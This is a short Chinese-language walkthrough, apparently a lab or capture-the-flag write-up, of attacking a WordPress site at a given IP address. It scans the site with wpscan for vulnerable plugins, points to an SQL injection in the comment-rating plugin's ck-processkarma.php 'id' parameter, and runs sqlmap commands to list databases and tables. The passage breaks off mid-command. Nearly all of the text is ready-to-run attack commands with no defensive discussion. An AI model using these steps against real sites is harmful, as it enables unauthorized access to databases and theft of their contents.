打开wpscan扫描,输入wpscan --url http://219.153.49.228:48780 --enumerate vp,这是扫描wordpress存在漏洞的插件
发现出现漏洞插件 [1566903968447592.png]
打开连接,查找到注入点define(‘URL’,$url[‘path’].‘wp-content/plugins/comment-rating/ck-processkarma.php?id=’.IDCOMMENT.’&action=add&path=a&imgIndex=1_14_’),于是开始构造连接http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a
打开sqlmap,开始查找数据库,表,列,字段值sqlmap -u “http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a” --dbs --batch;
sqlmap -u “http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a” -D “test” --tables;
sqlmap -u “http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&pa